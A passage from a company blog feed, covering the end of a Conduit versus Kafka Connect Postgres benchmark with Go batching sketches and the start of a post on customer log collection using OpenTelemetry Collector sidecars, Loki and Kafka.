        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/951aebd6b09f023545bdd982d14638b1/36c33/memory-usage.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 87.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAACCklEQVR42s2Uz2vUQBTH81+IdwUR8aLSigcv6p/hxYN6tB71JggexJugHkSpIBVEFMSTmqJLoOCvVdJuo9SNje42vycz2WQm+3UmWbc2TdcfFx2YJMx77/Pey3vzNExYIs+xatuw5Y7jGGEYwnVdWJaFNE2bTIiWS6PhcNgI5KLAO3MRhmHANE20Wi20223ouo4gCEqdmi3RPM8DIWT9aKRQpAzB3CzS1vyG818sonHOG4HcXcPS9G50z5ysHEi9oijGe4usiNbr9cp/Mw5/pCh8F8vHDsI5f7aSSchvRaieSZJsilB4EnhkCs65mX8MVEWJomhzyn8LZIyVPfb/pvynQMEF1FesP0X31HGk5vuf7Sa0TQ1YiAp4+znDibvA4rWb6OzaBvJCr4CVQ6JlWdbY2FsBL96n2H8JaN+4g49TO0GMlyO7YnLKXAKto9OysTcCLz+kOHwF+HB9Fp8O7EBSB6o0VZXVdRJCIMs4wkw6+drH0qG9+DxzGspFlg6UG1y4F2GfivDqLVh7tiOcf1bK1dUsgQqiIqSUgjEKL6TofONYWXHQe/II5O1rUDmqWM7B8wFMO8PjNxTLxgKcB3NIVr9I+eDHOKtSrmWLSMoM08daHEpQXp7RVwvwZAFTliDo2+hKEJPBNLbNGDh6RxToODnicH20Mdkefr8PPwjheT5UMZVFfR5+B2IsSuYJ3g4kAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;memory usage&quot;
        title=&quot;&quot;
        src=&quot;/static/951aebd6b09f023545bdd982d14638b1/5a190/memory-usage.png&quot;
        srcset=&quot;/static/951aebd6b09f023545bdd982d14638b1/772e8/memory-usage.png 200w,
/static/951aebd6b09f023545bdd982d14638b1/e17e5/memory-usage.png 400w,
/static/951aebd6b09f023545bdd982d14638b1/5a190/memory-usage.png 800w,
/static/951aebd6b09f023545bdd982d14638b1/36c33/memory-usage.png 946w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/bd85f9b87cc344f493683345189a33e9/d9199/message-throughput.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 83%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACX0lEQVR42q2Uy2sTURTG+48ILkU3RRHUUl8gilsRi266kboR/4T4qIIi6MqqDYK4MqZ1IUWqCXUTE0kk5FFMkU6nWaTJPJxJ5s4kkzszn/dOJzEvbBAP3Hndub/5vjPnngnXdanjOODheZ5/liQJsixD13VomgZVVf1rRVH8+97RWRMEnSCE0EqlAgbuTpZKJaTTaSSTSWSzWRSLRWQyGSQSCeTzeZR+rCOV+opCLgcvENMF8oNt22g2mxgn+Ddtx4PjjZzeBbbb7T4gV8oVDw42A6Xh4NJTE09WTJCFh5DfvOoHmqZJy+UyWq1W9ylfS50gp8HopEqquzh+20QoYmLn4lEIszPDChl0pGUO5DnyeoByw8XpeRP3lkxI1y5AvDW3t2Wh5iJepKhbuxQvyF0HeIoB70YZcOYcxJvX+4EMRnmJcMtusOjZqoXJOw6+RdZQm7sC8j3dSca/ARdjFqYeA6nnEQiT+1CPrQbvO3sDey13gC8/WzjxiAHD7yFOH0T9S3x8hZQFr/hehV3g4jLEqQOor8XGBzIQrVar/w84ynI4bmGa5zC8jO2Th9AYsHz2gYn5JQLp6nls/61sOsAF9pcP3weSL6LYOrIfevxTUJgUNd3BsRBB6J0F5fIZiDdmh4HcLmsSMAwCu0mQEwg+FtrYSGagfYjCEAWQNoVN22iQFlayLcQzOxDevobE1JuW5a/nFeMDBzc/j7LiorBZhaz9Au8nrixBXy+wew2krqIsbrJ9bTBX3rDCUcAtyUNFacLQVFDeLFQFxs8NaMyFrjdgMEUeb3l+0/gD/A0FJNlbZh9d+wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;message throughput&quot;
        title=&quot;&quot;
        src=&quot;/static/bd85f9b87cc344f493683345189a33e9/5a190/message-throughput.png&quot;
        srcset=&quot;/static/bd85f9b87cc344f493683345189a33e9/772e8/message-throughput.png 200w,
/static/bd85f9b87cc344f493683345189a33e9/e17e5/message-throughput.png 400w,
/static/bd85f9b87cc344f493683345189a33e9/5a190/message-throughput.png 800w,
/static/bd85f9b87cc344f493683345189a33e9/d9199/message-throughput.png 960w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Key Findings&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Regarding &lt;a href=&quot;https://conduit.io/docs/using/other-features/schema-support&quot;&gt;schema support&lt;/a&gt;: even though Conduit can maintain the schema of structured data through the pipeline, we disabled schema extraction on the source, since it wasn&apos;t needed here and we wanted to reduce overhead. This is done by setting both &lt;code class=&quot;language-text&quot;&gt;sdk.schema.extract.key.enabled&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;sdk.schema.extract.payload.enabled&lt;/code&gt; to false on the Postgres source connector, and it had a direct impact on performance.&lt;/p&gt;
&lt;p&gt;By implementing a &lt;code class=&quot;language-text&quot;&gt;ReadN&lt;/code&gt; method (supported thanks to our &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;Connector SDK&lt;/a&gt;), we were able to read multiple records at once, pulling batches of changes in a single operation. Implementing this method in the source Postgres connector resulted in a &lt;strong&gt;7.2%&lt;/strong&gt; improvement in CDC and a &lt;strong&gt;2.4%&lt;/strong&gt; boost in Snapshot mode.&lt;/p&gt;
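&lt;p&gt;As a rough illustration of why batched reads help, here is a minimal Go sketch. The &lt;code class=&quot;language-text&quot;&gt;Record&lt;/code&gt; type, the &lt;code class=&quot;language-text&quot;&gt;source&lt;/code&gt; struct, and the method signatures below are simplified stand-ins, not the actual Connector SDK types; the point is only that one &lt;code class=&quot;language-text&quot;&gt;ReadN&lt;/code&gt; call replaces many single &lt;code class=&quot;language-text&quot;&gt;Read&lt;/code&gt; calls, amortizing per-call overhead across the whole batch.&lt;/p&gt;

```go
package main

import "fmt"

// Record stands in for a change event; the real SDK defines its own record type.
type Record struct{ Position int }

// source simulates a connector with a queue of pending changes.
type source struct{ pending []Record }

// Read returns a single record per call: one call, and its overhead, per record.
func (s *source) Read() (Record, bool) {
	if len(s.pending) == 0 {
		return Record{}, false
	}
	r := s.pending[0]
	s.pending = s.pending[1:]
	return r, true
}

// ReadN returns up to n records in one call, so the per-call overhead is
// paid once per batch instead of once per record.
func (s *source) ReadN(n int) []Record {
	if n > len(s.pending) {
		n = len(s.pending)
	}
	batch := s.pending[:n]
	s.pending = s.pending[n:]
	return batch
}

func main() {
	s := &source{pending: make([]Record, 10)}
	fmt.Println(len(s.ReadN(4))) // a whole batch in a single call
	_, ok := s.Read()            // one record per call
	fmt.Println(ok)
}
```

&lt;p&gt;In a real connector each call can also cross a process boundary or hit the database, which is where replacing many calls with one batched call pays off most.&lt;/p&gt;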
&lt;h3&gt;&lt;strong&gt;CDC Mode&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit delivered &lt;strong&gt;7% higher throughput&lt;/strong&gt; (48,060 msg/s vs. 44,889 msg/s) and used &lt;strong&gt;98% less memory&lt;/strong&gt; (110 MB vs. 6,863 MB). CPU usage was also &lt;strong&gt;25% lower&lt;/strong&gt; (110% vs. 147%).&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Snapshot Mode&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;When configuring the Postgres source, it is worth specifying your desired batch size via the connector configuration parameters &lt;code class=&quot;language-text&quot;&gt;snapshot.fetchSize&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;sdk.batch.size&lt;/code&gt;. The optimal value in our experiments was 75,000, arrived at purely empirically. For Conduit, we felt comfortable bumping this number up, since memory consumption is clearly not an issue for it.&lt;/p&gt;
&lt;p&gt;In the end, throughput was &lt;strong&gt;3% higher&lt;/strong&gt; for Conduit (70,753 msg/s vs. 68,783 msg/s), with &lt;strong&gt;18% less memory&lt;/strong&gt; used (2,234 MB vs. 2,729 MB). However, CPU usage was &lt;strong&gt;25% higher&lt;/strong&gt; (231% vs. 184%).&lt;/p&gt;
&lt;h2&gt;Future improvements&lt;/h2&gt;
&lt;p&gt;We believe there is still potential to continue increasing speed by experimenting with different methods for moving data between goroutines. When we conducted tests using channels with various batch sizes and buffering strategies, we saw dramatic differences in performance depending on how data was grouped and transferred.&lt;/p&gt;
&lt;p&gt;For instance, sending 20 million objects one at a time over an unbuffered channel took around 5.5 seconds, while simply adding a buffer of size 50 brought that down to 1.8 seconds. The real breakthrough came when we increased the batch size to 1,000 or even 10,000—at that point, the total time dropped to just 80 ms, regardless of channel buffering.&lt;/p&gt;
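&lt;p&gt;The effect is easy to reproduce with a small Go sketch (a simplified illustration, not the actual Conduit code) contrasting per-item sends with batched sends over a channel. Timings vary by machine, so the sketch only demonstrates the mechanics: the batched variant performs one channel operation per batch instead of one per item.&lt;/p&gt;

```go
package main

import "fmt"

// sendSingly pushes n items through a channel one at a time:
// one channel operation (and one potential goroutine handoff) per item.
func sendSingly(n, buf int) int {
	ch := make(chan int, buf)
	go func() {
		for i := 0; i < n; i++ {
			ch <- i
		}
		close(ch)
	}()
	count := 0
	for range ch {
		count++
	}
	return count
}

// sendBatched groups items into slices of batchSize before sending,
// cutting the number of channel operations by a factor of batchSize.
func sendBatched(n, batchSize, buf int) int {
	ch := make(chan []int, buf)
	go func() {
		batch := make([]int, 0, batchSize)
		for i := 0; i < n; i++ {
			batch = append(batch, i)
			if len(batch) == batchSize {
				ch <- batch
				batch = make([]int, 0, batchSize)
			}
		}
		if len(batch) > 0 {
			ch <- batch // flush the final partial batch
		}
		close(ch)
	}()
	count := 0
	for batch := range ch {
		count += len(batch)
	}
	return count
}

func main() {
	const n = 1_000_000
	fmt.Println(sendSingly(n, 50))        // every item crosses the channel alone
	fmt.Println(sendBatched(n, 1000, 50)) // items cross in groups of 1,000
}
```

&lt;p&gt;Benchmarking the two variants with Go&apos;s &lt;code class=&quot;language-text&quot;&gt;testing&lt;/code&gt; package on your own hardware is the best way to see the gap for your workload.&lt;/p&gt;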
&lt;p&gt;Based on these results, we consider it well worth exploring batch sending from the CDC and snapshot iterators; there is a good chance we can achieve even greater performance by sending records in groups rather than one at a time. And since Conduit is JVM-free, we anticipate further throughput gains without having to worry about resource consumption. 🚀&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Let’s Chat!&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Curious about these benchmarks? Have ideas for new tests, or want to share your own results? Join us on &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; or start a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussion&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Flexible Logging With OpenTelemetry, Loki and Kafka]]></title><description><![CDATA[We’ve recently launched a feature to allow customers to view the logs from the applications they are creating. This is a walk through of the architecture we designed to make it all work using Conduit, OpenTelemetry Collector, Loki and Kafka.]]></description><link>https://meroxa.com/blog/flexible-logging-with-opentelemetry-loki-and-kafka</link><guid isPermaLink="false">https://meroxa.com/blog/flexible-logging-with-opentelemetry-loki-and-kafka</guid><dc:creator><![CDATA[Nathan Stehr]]></dc:creator><pubDate>Wed, 14 May 2025 14:30:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Application logs are one of those things we often take for granted. Quietly humming along in the background until something goes wrong at 3 a.m., and suddenly, they’re your best friend.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As more customers build and run applications on our platform, access to logs and visibility into what’s happening under the hood has become one of our most frequent and important feature requests.&lt;/p&gt;
&lt;p&gt;We’ve recently launched a feature that allows customers to view the logs from the applications they are creating, and in this post, I’ll walk through the architecture we designed to make it all work using &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt;, &lt;a href=&quot;https://opentelemetry.io/docs/collector/&quot;&gt;OpenTelemetry Collector&lt;/a&gt;, &lt;a href=&quot;https://grafana.com/docs/loki/latest/&quot;&gt;Loki&lt;/a&gt;, and &lt;a href=&quot;https://kafka.apache.org/&quot;&gt;Kafka&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;High Level Architecture&lt;/h2&gt;
&lt;p&gt;As a quick overview, our platform enables users to build and deploy data pipeline applications that move data between various sources and destinations. The data movement is powered by our open-source &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; solution. All this is running in Kubernetes.&lt;/p&gt;
&lt;p&gt;Our goal was to collect and expose both lifecycle logs and Conduit application logs to our customers. In addition to logs, we also wanted to surface relevant metrics. With this observability data in place, we felt that users would be equipped to quickly diagnose common issues such as misconfigurations or malformed URLs, as well as detect more elusive problems, such as connectivity disruptions or unexpected failures.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/8610669c8800bb415084cf5242effb8e/90eea/logging-high-level-arch.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 50.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAABYlAAAWJQFJUiTwAAAA+UlEQVR42n2SCQqFMAxEe/97KtQN913zeYGBKh8DoTXJTCeJwRI7jsPWdbVt2+y6Lj9x4th937bvu8eoI36ep7vuQWQQUASARNd1fie2LIsD8KZpbBgG93Ec/RHhH4QkAOIUTtPkdxECwCEix4PcU0EPQpHifd87EQCKKBZI7aOePCem1h+EMpGhRAA9CEg2z7PX0QEi/hIComUKaEuFqULNDcKqqqyua3dyQUkBIGOLUgcZMcDasjbKqW9O8AEwmyuKwhXpV0EZLkDbtq6Gh1IRbwvMqyxLizE6AFLk53luWZY5EcTkRPpJqM1qfukvkM6LwaMO9V/2A9WyECEICPMCAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Logging High-level architecture diagram&quot;
        title=&quot;&quot;
        src=&quot;/static/8610669c8800bb415084cf5242effb8e/5a190/logging-high-level-arch.png&quot;
        srcset=&quot;/static/8610669c8800bb415084cf5242effb8e/772e8/logging-high-level-arch.png 200w,
/static/8610669c8800bb415084cf5242effb8e/e17e5/logging-high-level-arch.png 400w,
/static/8610669c8800bb415084cf5242effb8e/5a190/logging-high-level-arch.png 800w,
/static/8610669c8800bb415084cf5242effb8e/c1b63/logging-high-level-arch.png 1200w,
/static/8610669c8800bb415084cf5242effb8e/29007/logging-high-level-arch.png 1600w,
/static/8610669c8800bb415084cf5242effb8e/90eea/logging-high-level-arch.png 2254w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Here’s a quick summary of the major components:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; (with sidecar collectors): Each Conduit instance runs with an OpenTelemetry Collector sidecar. These sidecars are responsible for capturing logs ‘locally’, close to where they&apos;re emitted, and forwarding them upstream.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Central OpenTelemetry Collector:&lt;/strong&gt; This component aggregates log data from all Conduit pods. It performs some basic processing and routing to downstream systems like Kafka and Loki.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://grafana.com/docs/loki/latest/&quot;&gt;Loki&lt;/a&gt;: Used as our primary store for customer logs. We query the relevant data using its REST API and display it in our UI. As part of the Loki configuration, we also control the retention period. We are fairly aggressive in pruning logs, as we’ve found that in our use cases they lose their relevance quickly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Kafka:&lt;/strong&gt; Serves as a transport layer for logs that need to be exported to customer-specific destinations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Customer-Facing Collector:&lt;/strong&gt; A separate OpenTelemetry Collector consumes from Kafka and exports logs to external systems, such as &lt;strong&gt;Datadog&lt;/strong&gt;, giving users access to their own application logs and metrics.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Except for Kafka, all of this runs on a &lt;strong&gt;per-tenant&lt;/strong&gt; basis.&lt;/p&gt;
&lt;h2&gt;Open Telemetry All The Things&lt;/h2&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/069cf338b1ccae72aef398dfb21a58f3/ce0a7/otel-all-things.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 77.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAABYlAAAWJQFJUiTwAAADOUlEQVR42l1SW0hUURQ9M2pvsvqIqMAgir7qI6EXEUVRRB9F/RQkZmY/jQ8i0jJKspIwpRAnIiEM8aMw8Ken0VPpYY/JTBSLGUezmSbnVc7c12qde685dmCx99137bUf5wikHF3XTRiGgf+PjEciEfT29qKvrw+apqX8HeeLiWnWDymoqip8Ph/a29vR1taGgoICVFZWIj8/Hy6XC9FozObqExSEoiiIxeIYGhrEw4cvcelSLcrLTxDlyMs7gIqKCtTXu9Hc3AyPx0NulJ1GkUj8sSWSxMC4YElJMXJz85CTsxctLbmoqTmP0tJTxDHU1tZRuAxXr9ab5LEx+/s98Hr99Di6vpNd3hpbDMSzZ0/x6dN7JJMGE9YxuA2NjdUoKzuCqqpdaGi4gt6+Qsi1qooc7yIi4esIBI6ZG9ONQ//EUnaomQm6XgNVE1DURfSrGV/B+Fn6q+l76W+jTcfwj6X4NSJTsxmLT9i/0PQQE/rtUDcrTucYgn4avL40fOnZgK7PexD8mcVOsznqZsZl0QxmPMJYQ5agJjtMsMoJohjS1419piAoODiUic7OywgGh/H4cQuamh7h9etmFhEmzzqqDSN1ZIWErUQWscnuUKCnpxCtrc9RVFSEefMW8vJykBhVKZqd0l3StiPM+SAFNXvcFxSbRggKOs1awZ9zceNGHTIzZ0MIgcWLF+G7P4qOF/vJ282cRvJ+c7rT/N5Oe08KKnaFbwyuShFMQywu8PXrFbjdN03BtetXY7BzCG+Pb6TYLO7+MPmziS3mE0oZOUB08cdpU1CGozGnufzu7gV497ED1e46PPj4HN4z9+Cfvx/hxGTr2ei1E2/ZwF22eoFCk0yCojgw4HfCN+BEctQpnyreV23Fr32tCOxwYzS9HOH0Unx/M5X8lTC0W5RqIm4TryCsMSfzYwbCEdmVk9ZhVVctO/xkDkKiEHCUAhmnkBSV8F9bZhbTVac5lW7MZGMHZYf37YAD8d8O82FLEXnTmu2HQmkILDlM9xz0jJO0F+AtWcPHkgFD3cNp75AXHt+hYRw1RQ047UsRltWsDke+TUFojotuBYx0KViFAVc2BZfzkYRTdqjjL1UBGZJj8g3JAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Open Telemetry all the things&quot;
        title=&quot;&quot;
        src=&quot;/static/069cf338b1ccae72aef398dfb21a58f3/5a190/otel-all-things.png&quot;
        srcset=&quot;/static/069cf338b1ccae72aef398dfb21a58f3/772e8/otel-all-things.png 200w,
/static/069cf338b1ccae72aef398dfb21a58f3/e17e5/otel-all-things.png 400w,
/static/069cf338b1ccae72aef398dfb21a58f3/5a190/otel-all-things.png 800w,
/static/069cf338b1ccae72aef398dfb21a58f3/c1b63/otel-all-things.png 1200w,
/static/069cf338b1ccae72aef398dfb21a58f3/ce0a7/otel-all-things.png 1590w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;As you can see from the architecture, we’ve leaned heavily on the OpenTelemetry Collector, because it gave us a lot of what we needed out of the box: flexibility, a large ecosystem of extensions, and a clean way to decouple log collection from our application code. From sidecar collectors, to centralized processing, to exporting logs to external systems, here’s how we put it all together.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sidecar Logging&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;One of the key areas where we wanted to provide visibility was around the provisioning and operation of data pipelines running inside Conduit. These processes handle the actual data movement between sources and destinations, so observability here is critical.&lt;/p&gt;
&lt;p&gt;In the Kubernetes world, the usual options for log collection are DaemonSets or sidecars. We initially explored using a DaemonSet, but ruled it out fairly quickly. Since we’re running a multi-tenant setup, where Conduit pods from different customers can land on the same node, a DaemonSet would make it difficult to reliably separate and route logs per tenant.&lt;/p&gt;
&lt;p&gt;With the sidecar approach, we get fine-grained control. By using the &lt;a href=&quot;https://kubernetes.io/docs/concepts/workloads/pods/downward-api/&quot;&gt;Kubernetes downward API&lt;/a&gt; along with the OpenTelemetry Collector’s &lt;code class=&quot;language-text&quot;&gt;filelog&lt;/code&gt; receiver, we’re able to pick up the right logs from the host and forward them to the appropriate downstream pipeline, all while preserving tenant isolation.
The &lt;a href=&quot;https://opentelemetry.io/docs/platforms/kubernetes/operator/&quot;&gt;OpenTelemetry Operator&lt;/a&gt; made this even easier. We just define the collector config and annotate our Conduit pods, and the operator takes care of injecting and managing the sidecars for us.&lt;/p&gt;
&lt;p&gt;Also, because a single customer application can involve multiple Conduit processes, we needed a way to consistently tie those logs back to the correct context. Here again, the downward API and the Collector’s &lt;code class=&quot;language-text&quot;&gt;resource&lt;/code&gt; processor come in handy, letting us attach the necessary metadata to each log record before it leaves the pod.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;Annotations&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;sidecar.opentelemetry.io/inject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean important&quot;&gt;true&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;em&gt;Annotation on Conduit pod for sidecar management&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;env&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; POD_NAMESPACE
    &lt;span class=&quot;token key atrule&quot;&gt;valueFrom&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;fieldRef&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; 
        &lt;span class=&quot;token key atrule&quot;&gt;fieldPath&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; metadata.namespace 
&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;        
&lt;span class=&quot;token key atrule&quot;&gt;receivers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;filelog&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; /var/log/pods/$&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;POD_NAMESPACE&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;_$&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;POD_NAME&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;_&lt;span class=&quot;token important&quot;&gt;*/conduit-server/*.log&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;resource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;action&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; insert
      &lt;span class=&quot;token key atrule&quot;&gt;key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; app.id
      &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;APP_ID&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;exporters&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;otlp&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;endpoint&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;CENTRAL_COLLECTOR&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;em&gt;Configuration snippet for the OpenTelemetry Collector running as a sidecar&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Central Open Telemetry Collector&lt;/strong&gt;&lt;/p&gt;
